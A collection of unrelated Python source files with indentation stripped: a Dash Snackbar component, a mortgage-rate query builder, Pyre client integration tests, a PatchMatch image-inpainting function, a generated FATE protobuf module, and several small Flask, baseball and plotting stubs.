from dash.development.base_component import Component, _explicitize_args
class Snackbar(Component):
"""A Snackbar component.
Material UI Snackbar component
Keyword arguments:
- children (a list of or a singular dash component, string or number; optional):
Elements to render inside the snackbar. Note that this will
override message and actions.
- id (string; required):
The element's ID.
- action (string; default ''):
The text of the action button inside the snackbar. If empty, no
action button will be added Note that this does not work with
children.
- actionStyles (dict; optional):
Styles to be applied to the action button.
- autoHideDuration (number; default 3000):
The number of milliseconds to wait before automatically
dismissing. If no value is specified the snackbar will dismiss
normally. If a value is provided the snackbar can still be
dismissed normally. If a snackbar is dismissed before the timer
expires, the timer will be cleared.
- className (string; default ''):
CSS class name of the root element.
- classes (dict; optional):
The classes to be applied to this component. This keys in this
object must be valid CSS rule names, and the values must be
strings for the classnames to be assigned to each rule name Valid
rule names are: root anchorOriginTopCenter
anchorOriginBottomCenter anchorOriginTopRight
anchorOriginBottomRight anchorOriginTopLeft
anchorOriginBottomLeft.
`classes` is a dict with keys:
- root (string; optional)
- anchorOriginTopCenter (string; optional)
- anchorOriginBottomCenter (string; optional)
- anchorOriginTopRight (string; optional)
- anchorOriginBottomRight (string; optional)
- anchorOriginTopLeft (string; optional)
- anchorOriginBottomLeft (string; optional)
- message (a list of or a singular dash component, string or number; default ''):
The message to be displayed. (Note: If the message is an element
or array, and the Snackbar may re-render while it is still open,
ensure that the same object remains as the message property if you
want to avoid the Snackbar hiding and showing again). Note that
this does not work with children.
- n_clicks (number; default 0):
An integer that represents the number of times that action button
has been clicked.
- open (boolean; default False):
Controls whether the Snackbar is opened or not.
- style (dict; optional):
Override the inline styles of the root element."""
@_explicitize_args
def __init__(self, children=None, action=Component.UNDEFINED, actionStyles=Component.UNDEFINED, autoHideDuration=Component.UNDEFINED, classes=Component.UNDEFINED, className=Component.UNDEFINED, fireEvent=Component.UNDEFINED, id=Component.REQUIRED, message=Component.UNDEFINED, n_clicks=Component.UNDEFINED, open=Component.UNDEFINED, style=Component.UNDEFINED, bodyStyle=Component.UNDEFINED, contentStyle=Component.UNDEFINED, **kwargs):
self._prop_names = ['children', 'id', 'action', 'actionStyles', 'autoHideDuration', 'className', 'classes', 'message', 'n_clicks', 'open', 'style']
self._type = 'Snackbar'
self._namespace = 'sd_material_ui'
self._valid_wildcard_attributes = []
self.available_properties = ['children', 'id', 'action', 'actionStyles', 'autoHideDuration', 'className', 'classes', 'message', 'n_clicks', 'open', 'style']
self.available_wildcard_properties = []
_explicit_args = kwargs.pop('_explicit_args')
_locals = locals()
_locals.update(kwargs) # For wildcard attrs
args = {k: _locals[k] for k in _explicit_args if k != 'children'}
for k in ['id']:
if k not in args:
raise TypeError(
'Required argument `' + k + '` was not specified.')
super(Snackbar, self).__init__(children=children, **args)
|
import string
import logging
class QueryHelper(object):
def __init__(self, logger, base_url):
self.logger = logger
self.base_url = base_url
self.house_price = u''
self.loan_amount = u''
self.minfico = u''
self.maxfico = u''
self.state = u''
self.rate_structure = u''
self.loan_term = u''
self.loan_type = u''
self.arm_type = u''
def build(self):
if (self.house_price == "missing"):
query_string = {'loan_amount': self.loan_amount,
'minfico': self.minfico,
'maxfico': self.maxfico,
'state': self.state,
'rate_structure': self.rate_structure,
'loan_term': self.loan_term,
'loan_type': self.loan_type,
'arm_type': self.arm_type}
elif (self.loan_amount == "missing"):
query_string = {'price': self.house_price,
'minfico': self.minfico,
'maxfico': self.maxfico,
'state': self.state,
'rate_structure': self.rate_structure,
'loan_term': self.loan_term,
'loan_type': self.loan_type,
'arm_type': self.arm_type}
elif (self.minfico == "missing"):
query_string = {'price': self.house_price,
'loan_amount': self.loan_amount,
'maxfico': self.maxfico,
'state': self.state,
'rate_structure': self.rate_structure,
'loan_term': self.loan_term,
'loan_type': self.loan_type,
'arm_type': self.arm_type}
elif (self.maxfico == "missing"):
query_string = {'price': self.house_price,
'loan_amount': self.loan_amount,
'minfico': self.minfico,
'state': self.state,
'rate_structure': self.rate_structure,
'loan_term': self.loan_term,
'loan_type': self.loan_type,
'arm_type': self.arm_type}
elif (self.state == "missing"):
query_string = {'price': self.house_price,
'loan_amount': self.loan_amount,
'minfico': self.minfico,
'maxfico': self.maxfico,
'rate_structure': self.rate_structure,
'loan_term': self.loan_term,
'loan_type': self.loan_type,
'arm_type': self.arm_type}
elif (self.rate_structure == "missing"):
query_string = {'price': self.house_price,
'loan_amount': self.loan_amount,
'minfico': self.minfico,
'maxfico': self.maxfico,
'state': self.state,
'loan_term': self.loan_term,
'loan_type': self.loan_type,
'arm_type': self.arm_type}
elif (self.loan_term == "missing"):
query_string = {'price': self.house_price,
'loan_amount': self.loan_amount,
'minfico': self.minfico,
'maxfico': self.maxfico,
'state': self.state,
'rate_structure': self.rate_structure,
'loan_type': self.loan_type,
'arm_type': self.arm_type}
elif (self.loan_type == "missing"):
query_string = {'price': self.house_price,
'loan_amount': self.loan_amount,
'minfico': self.minfico,
'maxfico': self.maxfico,
'state': self.state,
'rate_structure': self.rate_structure,
'loan_term': self.loan_term,
'arm_type': self.arm_type}
elif (self.arm_type == "missing"):
query_string = {'price': self.house_price,
'loan_amount': self.loan_amount,
'minfico': self.minfico,
'maxfico': self.maxfico,
'state': self.state,
'rate_structure': self.rate_structure,
'loan_term': self.loan_term,
'loan_type': self.loan_type}
else:
query_string = {'price': self.house_price,
'loan_amount': self.loan_amount,
'minfico': self.minfico,
'maxfico': self.maxfico,
'state': self.state,
'rate_structure': self.rate_structure,
'loan_term': self.loan_term,
'loan_type': self.loan_type,
'arm_type': self.arm_type}
return query_string
|
#!/usr/bin/env python3
import glob
import json
import logging
import os
import re
import shutil
import subprocess
import tempfile
import textwrap
import unittest
from abc import ABC
from contextlib import contextmanager
from logging import Logger
from pathlib import Path
from typing import Any, Dict, Generator, List, NamedTuple, Optional, Pattern
from pyre_paths import pyre_client
LOG: Logger = logging.getLogger(__name__)
CONFIGURATION = ".pyre_configuration"
LOCAL_CONFIGURATION = ".pyre_configuration.local"
BINARY_OVERRIDE = "PYRE_BINARY"
BINARY_VERSION_PATTERN: Pattern[str] = re.compile(r"Binary version: (\w*).*")
class FilesystemError(IOError):
pass
class CommandData(NamedTuple):
working_directory: str
command: List[str]
class PyreResult(NamedTuple):
command: str
output: Optional[str]
error_output: Optional[str]
return_code: int
@contextmanager
def _watch_directory(source_directory: str) -> Generator[None, None, None]:
subprocess.check_call(
["watchman", "watch", source_directory],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
yield
subprocess.check_call(
["watchman", "watch-del", source_directory],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
class TestCommand(unittest.TestCase, ABC):
directory: Path
typeshed: Path
command_history: List[CommandData]
def __init__(self, methodName: str) -> None:
super(TestCommand, self).__init__(methodName)
# workaround for initialization type errors
self.directory = Path(".")
self.typeshed = Path(".")
self.command_history = []
if not os.environ.get("PYRE_CLIENT"):
os.environ["PYRE_CLIENT"] = pyre_client
def setUp(self) -> None:
self.directory = Path(tempfile.mkdtemp())
self.typeshed = Path(self.directory, "fake_typeshed")
self.buck_config = Path(self.directory, ".buckconfig").touch()
Path(self.typeshed, "stdlib").mkdir(parents=True)
self.initial_filesystem()
def tearDown(self) -> None:
self.cleanup()
self.command_history = []
shutil.rmtree(self.directory)
def initial_filesystem(self) -> None:
pass
def cleanup(self) -> None:
pass
def create_project_configuration(
self, root: Optional[str] = None, contents: Optional[Dict[str, Any]] = None
) -> None:
root: Path = Path(root) if root else self.directory
configuration_path = root / CONFIGURATION
if not contents:
# Use binary override if it is built.
binary_override = os.environ.get(BINARY_OVERRIDE)
# TODO(T57341910): Set binary override in buck test.
if binary_override:
contents = {"version": "$BINARY_OVERRIDE"}
else:
# Default to published binary version.
output = subprocess.run(
["pyre", "--version"], capture_output=True
).stdout.decode()
output_match = re.match(BINARY_VERSION_PATTERN, output)
version = output_match.group(1) if output_match else None
if version and version != "No":
contents = {"version": version, "use_buck_builder": True}
else:
binary_location = shutil.which("pyre.bin")
if binary_location is None:
LOG.error(
"No project configuration content provided and "
"could not find a binary to run."
)
raise FilesystemError
contents = {"binary": binary_location}
with configuration_path.open("w+") as configuration_file:
json.dump(contents, configuration_file)
def create_local_configuration(self, root: str, contents: Dict[str, Any]) -> None:
root: Path = self.directory / root
root.mkdir(exist_ok=True)
with (root / LOCAL_CONFIGURATION).open("w+") as configuration_file:
json.dump(contents, configuration_file)
def create_directory(self, relative_path: str) -> None:
Path(self.directory, relative_path).mkdir(parents=True)
def create_file(self, relative_path: str, contents: str = "") -> None:
file_path = self.directory / relative_path
file_path.parent.mkdir(exist_ok=True, parents=True)
file_path.write_text(textwrap.dedent(contents))
def create_file_with_error(self, relative_path: str) -> None:
contents = """
def foo(x: int) -> str:
return x
"""
self.create_file(relative_path, contents)
def delete_file(self, relative_path: str) -> None:
try:
(self.directory / relative_path).unlink()
except FileNotFoundError:
LOG.debug(
"Deletion of {} skipped; file does not exist.".format(relative_path)
)
def run_pyre(
self,
command: str,
*arguments: str,
working_directory: Optional[str] = None,
timeout: int = 30,
prompts: Optional[List[str]] = None
) -> PyreResult:
working_directory: Path = (
self.directory / working_directory if working_directory else self.directory
)
prompt_inputs = "\n".join(prompts).encode() if prompts else None
# TODO(T60769864): Consider building shim if it exists.
command: List[str] = [
"pyre",
"--noninteractive",
"--output=json",
"--typeshed",
str(self.typeshed),
command,
*arguments,
]
try:
self.command_history.append(CommandData(str(working_directory), command))
process = subprocess.run(
command,
cwd=working_directory,
input=prompt_inputs,
timeout=timeout,
capture_output=True,
)
return PyreResult(
" ".join(command),
process.stdout.decode(),
process.stderr.decode(),
process.returncode,
)
except subprocess.TimeoutExpired as error:
stdout = error.stdout
stderr = error.stderr
result = PyreResult(
" ".join(command),
stdout.decode() if stdout else "",
stderr.decode() if stderr else "",
-1,
)
LOG.error(self.get_context(result))
raise error
def get_servers(self) -> List[Dict[str, Any]]:
result = self.run_pyre("--output=json", "servers")
try:
running_servers = json.loads(result.output or "")
except json.JSONDecodeError as json_error:
LOG.error(self.get_context(result))
raise json_error
return running_servers
def get_context(self, result: Optional[PyreResult] = None) -> str:
# TODO(T60769864): Avoid printing context twice in buck runs.
# TODO(T57341910): Log pyre rage / debug when appropriate.
context = ""
def format_section(title: str, *contents: str) -> str:
divider = "=" * 15
# pyre-ignore[9]: Unable to unpack `str`, expected a tuple.
contents = "\n\n".join([content.strip() for content in contents])
section = "\n\n{} {} {}\n\n{}\n".format(divider, title, divider, contents)
return section
# Pyre Output
if result:
if result.output or result.error_output:
context += format_section(
"Pyre Output",
"Command: `" + result.command + "`",
result.output or "",
result.error_output or "",
)
# Filesystem Structure
filesystem_structure = subprocess.run(
["tree", self.directory, "-a", "-I", "typeshed"], capture_output=True
).stdout.decode()
context += format_section("Filesystem Structure", filesystem_structure)
# Version Information
version_output = subprocess.run(
["pyre", "--version"], cwd=self.directory, capture_output=True
).stdout.decode()
configurations = glob.glob(
str(self.directory / "**/.pyre_configuration*"), recursive=True
)
configuration_contents = ""
for configuration in configurations:
configuration_contents += configuration + "\n "
configuration_contents += Path(configuration).read_text() + "\n\n"
context += format_section("Versioning", version_output, configuration_contents)
# Repro Instructions
instructions = ""
if self.command_history:
instructions += "- Create directory structure above and run:\n\t"
instructions += "\n\t".join(
[
"["
+ str(command.working_directory).replace(
str(self.directory), "$project_root"
)
+ "] "
+ " ".join(command.command)
for command in self.command_history
]
)
test_id = self.id()
instructions += "\n\n- Re-run only this failing test:\n\t"
instructions += "[tools/pyre] python3 {} {}".format(
"scripts/run_client_integration_test.py", test_id
)
instructions += "\n\n- Flaky? Stress test this failing test:\n\t"
test_target = "//tools/pyre/scripts:pyre_client_integration_test_runner"
buck_arguments = "--jobs 18 --stress-runs 20 --record-results"
test_name = test_id.split(".")[-1]
test_qualifier = r"\.".join(test_id.split(".")[:-1])
instructions += r"[tools/pyre] buck test {} -- '{} \({}\)' {}".format(
test_target, test_name, test_qualifier, buck_arguments
)
context += format_section("Repro Instructions", instructions)
return context
def assert_succeeded(self, result: PyreResult) -> None:
self.assertEqual(result.return_code, 0, self.get_context(result))
def assert_failed(self, result: PyreResult) -> None:
self.assertEqual(result.return_code, 2, self.get_context(result))
def assert_output_matches(
self, result: PyreResult, expected_pattern: Pattern[str]
) -> None:
output = result.output or ""
result_match = re.match(expected_pattern, output.strip())
self.assertTrue(result_match is not None, self.get_context(result))
def assert_has_errors(self, result: PyreResult) -> None:
self.assertEqual(result.return_code, 1, self.get_context(result))
def assert_no_errors(self, result: PyreResult) -> None:
self.assertEqual(result.return_code, 0, self.get_context(result))
def assert_file_exists(
self, relative_path: str, json_contents: Optional[Dict[str, Any]] = None
) -> None:
file_path = self.directory / relative_path
self.assertTrue(file_path.exists(), self.get_context())
if json_contents:
file_contents = file_path.read_text()
self.assertEqual(
json.loads(file_contents), json_contents, self.get_context()
)
def assert_server_exists(
self, server_name: str, result: Optional[PyreResult] = None
) -> None:
running_servers = self.get_servers()
server_exists = any(server["name"] == server_name for server in running_servers)
self.assertTrue(server_exists, self.get_context(result))
def assert_server_does_not_exist(
self, server_name: str, result: Optional[PyreResult] = None
) -> None:
running_servers = self.get_servers()
server_exists = any(server["name"] == server_name for server in running_servers)
self.assertFalse(server_exists, self.get_context(result))
def assert_no_servers_exist(self, result: Optional[PyreResult] = None) -> None:
self.assertEqual(self.get_servers(), [], self.get_context(result))
class BaseCommandTest(TestCommand):
# TODO(T57341910): Test command-agnostic behavior like `pyre --version`
pass
class AnalyzeTest(TestCommand):
# TODO(T57341910): Fill in test cases
# Currently fails with invalid model error.
pass
class CheckTest(TestCommand):
def initial_filesystem(self) -> None:
self.create_project_configuration()
self.create_file_with_error("local_project/has_type_error.py")
def test_command_line_source_directory_check(self) -> None:
result = self.run_pyre("--source-directory", "local_project", "check")
self.assert_has_errors(result)
result = self.run_pyre("-l", "local_project", "check")
self.assert_failed(result)
def test_command_line_targets_check(self) -> None:
pass
def test_local_configuration_check(self) -> None:
self.create_local_configuration("local_project", {"source_directories": ["."]})
result = self.run_pyre("-l", "local_project", "check")
self.assert_has_errors(result)
class ColorTest(TestCommand):
# TODO(T57341910): Fill in test cases.
# pyre -l project path current fails with server connection failure.
pass
class DeobfuscateTest(TestCommand):
# TODO(T57341910): Fill in test cases.
# Currently fails with error parsing command line, no help.
pass
class IncrementalTest(TestCommand):
def cleanup(self) -> None:
self.run_pyre("kill")
def initial_filesystem(self) -> None:
self.create_project_configuration()
self.create_directory("local_project")
self.create_local_configuration("local_project", {"source_directories": ["."]})
self.create_file_with_error("local_project/has_type_error.py")
self.create_file(".watchmanconfig", "{}")
def test_no_existing_server(self) -> None:
result = self.run_pyre(
"-l", "local_project", "incremental", "--incremental-style=fine_grained"
)
self.assert_has_errors(result)
class InferTest(TestCommand):
def initial_filesystem(self) -> None:
self.create_project_configuration()
self.create_local_configuration("local_project", {"source_directories": ["."]})
contents = """
def foo():
return 1
"""
self.create_file("local_project/missing_annotation.py", contents)
def test_infer_stubs(self) -> None:
self.run_pyre("-l", "local_project", "infer")
self.assert_file_exists(
".pyre/local_project/types/local_project/missing_annotation.pyi"
)
def test_infer_in_place(self) -> None:
pass
def test_infer_from_existing_stubs(self) -> None:
pass
def test_infer_from_json(self) -> None:
pass
def test_infer_options(self) -> None:
# print-only, full-only, recursive
pass
class InitializeTest(TestCommand):
def initial_filesystem(self) -> None:
self.create_file("fake_pyre.bin")
# TODO(T57341910): Make prompting explicit, test conditions that skip prompts.
def test_initialize_project_configuration(self) -> None:
with _watch_directory(self.directory):
self.run_pyre(
"init",
prompts=["y", "fake_pyre.bin", "fake_typeshed", "//example:target"],
)
expected_contents = {
"binary": str(self.directory / "fake_pyre.bin"),
"source_directories": ["//example:target"],
"typeshed": str(self.directory / "fake_typeshed"),
}
self.assert_file_exists(
".pyre_configuration", json_contents=expected_contents
)
def test_initialize_local_configuration(self) -> None:
self.create_directory("local_project")
with _watch_directory(self.directory):
self.run_pyre(
"init",
"--local",
working_directory="local_project",
prompts=["Y", "//example:target", "Y", "Y", "Y"],
)
expected_contents = {
"differential": True,
"push_blocking": True,
"targets": ["//example:target"],
}
self.assert_file_exists(
"local_project/.pyre_configuration.local",
json_contents=expected_contents,
)
class KillTest(TestCommand):
def initial_filesystem(self) -> None:
self.create_project_configuration()
self.create_local_configuration("local_one", {"source_directories": ["."]})
self.create_file_with_error("local_one/has_type_error.py")
self.create_local_configuration("local_two", {"source_directories": ["."]})
self.create_file_with_error("local_two/has_type_error.py")
def test_kill_without_server(self) -> None:
self.assert_no_servers_exist()
result = self.run_pyre("kill")
self.assert_succeeded(result)
self.assert_no_servers_exist()
def test_kill(self) -> None:
self.run_pyre("-l", "local_one", "start")
self.assert_server_exists("local_one")
self.run_pyre("kill")
self.assert_no_servers_exist()
self.run_pyre("-l", "local_one", "restart")
self.assert_server_exists("local_one")
self.run_pyre("kill")
self.assert_no_servers_exist()
self.run_pyre("-l", "local_one")
self.run_pyre("-l", "local_two")
self.assert_server_exists("local_one")
self.assert_server_exists("local_two")
self.run_pyre("kill")
self.assert_no_servers_exist()
class PersistentTest(TestCommand):
# TODO(T57341910): Fill in test cases.
pass
class ProfileTest(TestCommand):
# TODO(T57341910): Fill in test cases.
pass
class QueryTest(TestCommand):
# TODO(T57341910): Fill in test cases.
# TODO(T57341910): Test pyre query help.
pass
class RageTest(TestCommand):
# TODO(T57341910): Fill in test cases.
pass
class ReportingTest(TestCommand):
# TODO(T57341910): Fill in test cases.
pass
class RestartTest(TestCommand):
def initial_filesystem(self) -> None:
self.create_project_configuration()
self.create_local_configuration("local_one", {"source_directories": ["."]})
self.create_file_with_error("local_one/has_type_error.py")
self.create_local_configuration("local_two", {"source_directories": ["."]})
self.create_file_with_error("local_two/has_type_error.py")
def test_restart(self) -> None:
# TODO(T57341910): Test blank restart
self.assert_no_servers_exist()
result = self.run_pyre("-l", "local_one", "restart")
self.assert_has_errors(result)
self.assert_server_exists("local_one")
result = self.run_pyre("-l", "local_one", "restart")
self.assert_has_errors(result)
self.assert_server_exists("local_one")
class ServersTest(TestCommand):
def initial_filesystem(self) -> None:
self.create_project_configuration()
self.create_local_configuration("local_one", {"source_directories": ["."]})
self.create_file_with_error("local_one/has_type_error.py")
self.create_local_configuration("local_two", {"source_directories": ["."]})
self.create_file_with_error("local_two/has_type_error.py")
def test_list_servers(self) -> None:
result = self.run_pyre("--output=json", "servers", "list")
self.assert_output_matches(result, re.compile(r"\[\]"))
self.run_pyre("-l", "local_one")
result = self.run_pyre("servers", "list")
self.assert_output_matches(
result, re.compile(r"\[\{\"pid\": .*, \"name\": \"local_one\"\}\]")
)
self.run_pyre("-l", "local_two")
result = self.run_pyre("servers", "list")
self.assert_output_matches(
result,
re.compile(
r"\[\{\"pid\": .*, \"name\": \"(local_one|local_two)\"\}, "
+ r"{\"pid\": .*, \"name\": \"(local_one|local_two)\"\}\]"
),
)
class StartTest(TestCommand):
def cleanup(self) -> None:
self.run_pyre("kill")
def initial_filesystem(self) -> None:
self.create_project_configuration()
self.create_directory("local_project")
self.create_local_configuration("local_project", {"source_directories": ["."]})
self.create_file_with_error("local_project/test.py")
def test_server_start(self) -> None:
with _watch_directory(self.directory):
result = self.run_pyre("-l", "local_project", "start")
self.assert_no_errors(result)
# TODO(T57341910): Test concurrent pyre server processes.
class StatisticsTest(TestCommand):
# TODO(T57341910): Fill in test cases.
pass
class StopTest(TestCommand):
def initial_filesystem(self) -> None:
self.create_project_configuration()
self.create_local_configuration("local_one", {"source_directories": ["."]})
self.create_file_with_error("local_one/has_type_error.py")
self.create_local_configuration("local_two", {"source_directories": ["."]})
self.create_file_with_error("local_two/has_type_error.py")
def test_stop_without_server(self) -> None:
self.assert_no_servers_exist()
result = self.run_pyre("stop")
self.assert_succeeded(result)
result = self.run_pyre("-l", "local_one", "stop")
self.assert_succeeded(result)
self.assert_no_servers_exist()
def test_stop(self) -> None:
self.run_pyre("-l", "local_one", "start")
self.assert_server_exists("local_one")
self.run_pyre("-l", "local_two", "stop")
self.assert_server_exists("local_one")
self.run_pyre("-l", "local_one", "stop")
self.assert_no_servers_exist()
self.run_pyre("-l", "local_one", "restart")
self.assert_server_exists("local_one")
self.run_pyre("-l", "local_one", "stop")
self.assert_no_servers_exist()
self.run_pyre("-l", "local_one", "start")
self.run_pyre("-l", "local_two", "start")
self.run_pyre("-l", "local_one", "stop")
self.assert_server_exists("local_two")
self.assert_server_does_not_exist("local_one")
if __name__ == "__main__":
unittest.main()
|
from __future__ import print_function, division
import numpy as np
import cv2
import matplotlib.pyplot as plt
import pycuda.driver as drv
import pycuda.autoinit
import pycuda.gpuarray as gpuarray
from pycuda.compiler import SourceModule
from PatchMatch.PatchMatchCuda import PatchMatch
def paint(Iorg, Mask, verbose=True, sigma=0.1):
Iorg=cv2.cvtColor(Iorg,cv2.COLOR_BGR2Lab)
width=7
match_iter=10
diffthresh=1
if width%2==0:
raise Exception('The width should be an odd integer.')
padwidth=int(width/2)
if Mask.ndim!=2:
if Mask.ndim==3 and Mask.shape[2]==1:
Mask=Mask[:,:,0]
else:
raise Exception('The dimension of Mask is incorrect.')
[m,n,chn]=Iorg.shape
startscale=int(-np.ceil(np.log2(min(m,n)))+5)
scale=2**startscale
I=cv2.resize(Iorg,(0,0),fx=scale,fy=scale)
M=cv2.resize(Mask,(0,0),fx=scale,fy=scale,interpolation=cv2.INTER_NEAREST)
M=M>0
[m,n,chn]=I.shape
Rnd=np.random.randint(256,size=[m,n,chn],dtype='uint8')
I[M]=Rnd[M]
for logscale in range(startscale,1):
scale=2**logscale
iterations=10
if verbose:
print('Scale = 2^%d'%logscale)
for iter in range(iterations):
if verbose:
plt.imshow(cv2.cvtColor(I,cv2.COLOR_Lab2RGB))
plt.pause(0.001)
Iprev=I.astype('float32')
I=Iprev/255
B=I.copy()
B[M]=0
maxoff=max(I.shape[:2])
pm=PatchMatch(I,I,B,B,width)
pm.propagate(iters=match_iter,rand_search_radius=maxoff)
ann=pm.nnf.copy()
Ipad=np.pad(I,((padwidth,padwidth),(padwidth,padwidth),(0,0)),'reflect')
patchj,patchi=np.meshgrid(np.arange(width),np.arange(width))
indj,indi=np.meshgrid(np.arange(n),np.arange(m))
patchi=indi[:,:,np.newaxis,np.newaxis]+patchi[np.newaxis,np.newaxis]
patchj=indj[:,:,np.newaxis,np.newaxis]+patchj[np.newaxis,np.newaxis]
matchj=ann[:,:,0]
matchi=ann[:,:,1]
orgind=np.vstack((indi.ravel(),indj.ravel()))
matchind=np.vstack((matchi[orgind[0],orgind[1]],matchj[orgind[0],orgind[1]]))
indmap=np.vstack((orgind,matchind))
indmap=indmap[:,M[orgind[0],orgind[1]]]
curi=patchi[indmap[0],indmap[1]]
curj=patchj[indmap[0],indmap[1]]
orgim=Ipad[curi,curj]
groupind=np.ravel_multi_index((curi,curj),(m+width-1,n+width-1))
curi=patchi[indmap[2],indmap[3]]
curj=patchj[indmap[2],indmap[3]]
patchim=Ipad[curi,curj]
#I 3 channels
d=np.sum((orgim-patchim)**2,axis=(1,2,3))
sim=np.exp(-d/(2*sigma**2),dtype='float64')
R=sim[:,np.newaxis,np.newaxis,np.newaxis]*patchim
sumpatch=[np.bincount(groupind.ravel(),weights=R[...,i].ravel()) for i in range(chn)]
Rlst=[np.zeros([m+width-1,n+width-1],dtype='float64') for _ in range(chn)]
for i in range(chn):
Rlst[i].ravel()[:sumpatch[i].size]=sumpatch[i]
R=np.dstack(Rlst)
sim=np.tile(sim[:,np.newaxis,np.newaxis],[1,width,width])
sumsim=np.bincount(groupind.ravel(),weights=sim.ravel())
Rcount=np.zeros([m+width-1,n+width-1],dtype='float64')
Rcount.ravel()[:sumsim.size]=sumsim
Rcountmsk=Rcount>0
R[Rcountmsk]=R[Rcountmsk]/Rcount[Rcountmsk,np.newaxis]
R=R[padwidth:m+padwidth,padwidth:n+padwidth]
R[~M]=I[~M]
I=(255*R+0.5).astype('uint8')
if iter>0:
diff=np.sum((I.astype('float32')-Iprev)**2)/np.sum(M)
if verbose:
print('diff = %f'%diff)
if diff<diffthresh:
break
elif verbose:
print()
if logscale<0:
Idata=cv2.resize(Iorg,(0,0),fx=scale*2,fy=scale*2)
m,n,chn=Idata.shape
I=cv2.resize(I,(n,m))
M=cv2.resize(Mask,(n,m),interpolation=cv2.INTER_NEAREST)
M=M>0
I[~M]=Idata[~M]
return cv2.cvtColor(I,cv2.COLOR_Lab2BGR)
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: label-transform-meta.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='label-transform-meta.proto',
package='com.webank.ai.fate.core.mlmodel.buffer',
syntax='proto3',
serialized_options=_b('B\027LabelTransformMetaProto'),
serialized_pb=_b('\n\x1alabel-transform-meta.proto\x12&com.webank.ai.fate.core.mlmodel.buffer\"&\n\x12LabelTransformMeta\x12\x10\n\x08need_run\x18\x01 \x01(\x08\x42\x19\x42\x17LabelTransformMetaProtob\x06proto3')
)
_LABELTRANSFORMMETA = _descriptor.Descriptor(
name='LabelTransformMeta',
full_name='com.webank.ai.fate.core.mlmodel.buffer.LabelTransformMeta',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='need_run', full_name='com.webank.ai.fate.core.mlmodel.buffer.LabelTransformMeta.need_run', index=0,
number=1, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=70,
serialized_end=108,
)
DESCRIPTOR.message_types_by_name['LabelTransformMeta'] = _LABELTRANSFORMMETA
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
LabelTransformMeta = _reflection.GeneratedProtocolMessageType('LabelTransformMeta', (_message.Message,), {
'DESCRIPTOR' : _LABELTRANSFORMMETA,
'__module__' : 'label_transform_meta_pb2'
# @@protoc_insertion_point(class_scope:com.webank.ai.fate.core.mlmodel.buffer.LabelTransformMeta)
})
_sym_db.RegisterMessage(LabelTransformMeta)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
|
from datetime import datetime
import attr
from requests import Session
from baseball_utils.gameday import GamedayData
from baseball_utils.savant import Savant
from baseball_utils.util import SESSION, default_attrs
def get_today():
td = Today(SESSION)
return td.probables()
@default_attrs()
class Today(object):
session: Session = attr.ib()
gd: GamedayData = attr.ib(init=False)
def __attrs_post_init__(self):
self.gd = GamedayData(self.session, Savant(self.session))
def probables(self):
pass
if __name__ == '__main__':
pass
|
"""
This program is to make diagrams that are too frustrating to do by hand
"""
import matplotlib.pyplot as plt
import math
import numpy as np
def main(*args,**kwargs):
""" Makes diagram figures """
print 'Creating figures for Figure 2A...'
rows,columns = 8,12
cpw = 10
colors = [(a,a,a) for a in [0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9]]
well_dev = 0.2
cell_size = 100
well_size = 60
well_edge_size = 5
margin = (0.7,2)
w_i = 5
w_j = 7
w_ij = 23
w_o = 61
x = np.linspace(1,rows,rows)
y = np.linspace(1,columns,columns)
x_mesh,y_mesh = np.meshgrid(x,y)
for mode in ['cells','dna']:#['cells','dna']:
np.random.seed(42)
fig = plt.figure(figsize=(rows+margin[0], 0.9*columns+margin[1]), dpi=200, facecolor='w', edgecolor='k')
ax = plt.gca()
if mode == 'cells':
for i,j in zip(x_mesh.flatten(),y_mesh.flatten()):
well_colors = [colors[np.random.randint(0,len(colors))] for _ in xrange(cpw)]
r, theta = [well_dev*np.sqrt(np.random.rand(cpw,1)), 2*math.pi*np.random.rand(cpw,1)]
x_mod,y_mod = r*np.cos(theta),r*np.sin(theta)
x_well = i + x_mod
y_well = j + y_mod
plt.scatter(x_well,y_well,color=well_colors,s=cell_size,zorder=10)
elif mode == 'dna':
combos = [(i,j) for i in xrange(1,rows+1) for j in xrange(1,columns+1)]
np.random.shuffle(combos)
w_j_indices = combos[:w_i+w_ij]
w_i_indices = combos[w_i:w_i+w_j+w_ij]
sets = [(w_i_indices,(0.3,0.3,0.3),-0.1),(w_j_indices,(0.6,0.6,0.6),0.1)]
for w,c,shift in sets:
for x,y in w:
dy = np.linspace(-0.25,0.25,101)
dx = 0.075*np.sin(12*dy)
plt.scatter(x + dy + 0, y + dx + shift,color=c,s=20)
plt.plot(x_mesh,y_mesh,'ko',color='black',markerfacecolor='white',markersize=well_size,zorder=0,markeredgewidth=well_edge_size)
plt.xlim([0.5,rows+0.5])
plt.ylim([0.5,columns+0.5])
plt.axis('off')
#fig.patch.set_facecolor([1.0,1.0,1.0])
fig.patch.set_facecolor([0.9,0.9,0.9])
plt.subplots_adjust(left=0.02, right=0.98, top=0.98, bottom=0.02)
plt.savefig('{}.png'.format(mode),facecolor=fig.get_facecolor(), edgecolor='k',edgewidth=5)
print 'Saved {}.png!'.format(mode)
if __name__ == '__main__':
main()
|
# -*- coding:utf8 -*-
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_wechatpy import Wechat
from flask_login import LoginManager
from flask_session import Session
from config import config
from wechatpy import WeChatClient
from wechatpy.client.api import WeChatJSAPI
db = SQLAlchemy()
wechat = Wechat()
#session = Session()
|
import pandas as pd
import numpy as np
# Load .npz data files containing all variables
